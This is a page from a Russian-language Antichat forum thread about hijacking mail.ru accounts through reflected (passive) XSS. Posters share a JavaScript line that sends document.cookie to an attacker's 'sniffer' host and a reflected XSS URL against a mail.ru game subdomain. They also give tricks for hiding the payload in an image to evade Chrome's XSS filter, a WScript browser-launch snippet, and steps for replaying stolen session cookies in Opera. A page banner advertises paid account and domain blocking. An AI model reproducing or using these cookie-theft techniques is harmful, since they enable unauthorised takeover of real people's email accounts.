Взлом mail.ru с помощью пассивной xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Взлом mail.ru с помощью пассивной xss

Страница 5 из 18

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#41

30.01.2012, 01:00

m744na

Новичок

Регистрация: 29.03.2011

Сообщений: 1

С нами: 7959926

Репутация: 0

Nick Hander,и на том спасибо (за наводочку))

#42

30.01.2012, 01:00

dryha_777

Новичок

Регистрация: 17.01.2012

Сообщений: 16

С нами: 7536566

Репутация: 0

а как менять в мозиле то мне пришли кукри мозилы

#43

30.01.2012, 01:00

MOV_EAX

Участник форума

Регистрация: 10.02.2010

Сообщений: 181

С нами: 8553206

Репутация: 5

качайте видео отредактируйте файл xss.jpg измените ссылку на свой снифер

сам .js файл

PHP highlight

Код:


	Код:
	img= newImage();img.src="httpz://ссылка на снифер/s.gif?"+document.cookie;

#44

30.01.2012, 01:00

RED_DEVIL_69

Участник форума

Регистрация: 14.09.2010

Сообщений: 223

С нами: 8242166

Репутация: 5

Цитата:

Сообщение от tickhack

куки выглидат так 6325749802:4f015258665e2ef6150502190f1d081b0a014f6 c5150445e070f00050d1d000b03184b4c515958421c0e0d165 8505d5b174345:мыло@mail.ru: их ты должен вставить в опере как вставлять я уже объяснял

Я прекрасно знаю как выглядят КУКИ, и куда их нужно вставлять... И пиши правильно слова... Не нужно торопиться)

#45

31.01.2012, 01:00

MOV_EAX

Участник форума

Регистрация: 10.02.2010

Сообщений: 181

С нами: 8553206

Репутация: 5

Цитата:

Сообщение от beknazar

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

наверно так и есть что ты вышел с этого мира тебе наверно лень скачать видео который я скинул ,там все показано как при помощи ифраме в картинке без всяких редиректов угнать кукисы,
а для хроме много вариантов пример этот вот скриптик

PHP highlight

Код:


	Код:
	varWshShell=WScript.CreateObject("WScript.Shell");
WshShell.Run("Chrome.exe httpz://На это влияет браузер? я думаю что нет");

то есть вместо Chrome.exe поставить можно так iexplore.ехе

если мы знаем точно что жертва пользуется хроме то запустится вместо Chrome.exe ---> iexplore.ехе
и кинет на ссылку ,в этом случае мы избегаем запуск самого хроме по умолчанию.

так же можно сделать и с оперой ,
если мы знаем что хроме стоит у жертвы по умолчанию.

#46

31.01.2012, 01:00

MOV_EAX

Участник форума

Регистрация: 10.02.2010

Сообщений: 181

С нами: 8553206

Репутация: 5

Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;

это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме
пример:

PHP highlight

Код:


	Код:
	http://w4.dwar.mail.ru/register.php?referrer=%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%3E%3Cdiv%20style=%22text-align:center;%22%3E%3Cimg%20src=%22http://www.htmlcodes.me/images/marquees/flying_bat.gif%22%20width=%22125%22%20height=%2282%22%20alt=%22Flying%20bat%20in%20a%20marquee%22%20/%3E%3Cbr%20/%3EBruce%20the%20Bat%3C/div%3E%3C/marquee%3E%3Cp%3E%3Ca%20style=%22font-size:11px;color:#999;" href="http://www.html.am/html-editors/online-html-editor.cfm">HTML editor0height="82"%20alt="Flying%20bat%20in%20a%20marquee"%20/>Bruce%20the%20BatHTML editorrquee>marquee>

теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif <--- на наш который будет в картинке ,если Вы оставите расширение .jsто куки не придут ,если дадите прямую ссылку на снифер то на снифер придет только адрес оттуда откуда Вы запустили яд.

#47

31.01.2012, 01:00

stivens20

Постоянный

Регистрация: 14.12.2011

Сообщений: 310

С нами: 7585526

Репутация: 2

Цитата:

Сообщение от beknazar

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

Конечно же ведь опера хорошо запасается всеми ресурсами да и страницы сохраняеет почти как оригинал.

#48

31.01.2012, 01:00

beknazar

Участник форума

Регистрация: 01.12.2010

Сообщений: 188

С нами: 8129846

Репутация: 8

Значит он вышел из своего мира и куки умерли! Да но я почему то немоту. На это влияет браузер? я думаю что нет ( тогда я туплю...

#49

31.01.2012, 01:00

beknazar

Участник форума

Регистрация: 01.12.2010

Сообщений: 188

С нами: 8129846

Репутация: 8

Короче люди кто пользуется Google chrome. Куй вы у них выкрадите куки. Я щас пробовал на хроме нечего не получилось,а на опере всё норм.

P.S: большинство людей пользуются Oper'ой.

#50

02.02.2012, 01:00

tickhack

Новичок

Регистрация: 24.01.2012

Сообщений: 11

С нами: 7526486

Репутация: -10

Цитата:

Сообщение от rox@hak

tickhack, ну что сказать, у тебя наконец то хоть что-то, почти получилось полезное! добавь что достаточно изменить куку Mpop, и сделай обход анти xss фильтра в хроме для этой пасивки!

если получилось что то полезное то не откажусь от +

Страница 5 из 18

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка